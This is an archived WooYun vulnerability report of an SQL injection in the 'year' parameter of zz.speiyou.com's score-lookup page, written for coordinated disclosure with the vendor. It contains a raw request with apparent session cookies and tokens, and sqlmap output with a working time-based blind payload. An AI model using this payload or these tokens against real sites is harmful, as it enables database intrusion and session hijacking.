乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-08: 细节已通知厂商并且等待厂商处理中 2015-07-09: 厂商已经确认,细节仅向厂商公开 2015-07-19: 细节向核心白帽子及相关领域专家公开 2015-07-29: 细节向普通白帽子公开 2015-08-08: 细节向实习白帽子公开 2015-08-23: 细节向公众公开
注入:POST /Students/getScore/ HTTP/1.1Host: zz.speiyou.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://zz.speiyou.com/Students/getScore/Cookie: CAKEPHP=jv6johj4hvkejopht9u1qfema0; lastact=http%3A%2F%2Fzz.speiyou.com%2FUsers%2FcompleteInfo%2F; BIGipServerPY_Web-YouHua_Pool=1846257856.20480.0000; jfs=http%3A%2F%2Fzz.speiyou.com%2Fhomes%3Ftk%3DZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; Hm_lvt_7140e3d0654bb622b1e162589f9e278c=1436275347; Hm_lpvt_7140e3d0654bb622b1e162589f9e278c=1436276354; XESCAS[tk]=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; stoken=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; CakeCookie[XESCAS][Cas]=W%19%D8Xth%E6q%B3%A4%90E%1D%80%B5%07%18%17%2C%94C%AD%60%10%C7s%E9%E6%22%AB%1B%24yC%F9%28%27%F8%16%8F%85R%FC%CF%E4%DDM+%F1%0D%D7h+%D0%D46%2A%82%E0%CAI%E84%FF%EAF%BC%16%28_%92p%8D%CA%0B%14%23%E9dX%0B%B5%17%A1%F3%8D%93%8B%C1g%9BmG%7C%97%16%CE%DE_%8FG%FAi5%7B%B0%22%98%3FV_%B7%C4%07R%D5%C6cb%5Cz%94e%08%D2%10%40%16%8D%0B%F8u%26%1C%92%AE%A7%ED%DE%3B%18%8D%E0d; newstoken=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; __utma=190819817.287472353.1436276128.1436276128.1436276128.1; __utmb=190819817.2.10.1436276128; __utmc=190819817; __utmz=190819817.1436276128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; Hm_lvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436276128; Hm_lpvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436276130; indexGradeType=gaozhong; indexGrade=10; indexSubject=ff80808127d77caa0127d7e10f1c00c4; looyu_id=5d3a668cd242b8126a2601c28d8eb1e256_31691%3A1; B_cookie_login_status=okConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 78year=2015&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2
参数:year
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: year (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: year=2015' AND (SELECT * FROM (SELECT(SLEEP(5)))UNfm) AND 'rYiJ'='rYiJ&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2---back-end DBMS: MySQL 5.0.12current database: 'py_rxcs'
过滤相关参数
危害等级:高
漏洞Rank:15
确认时间:2015-07-09 19:17
谢谢,正在修复中
暂无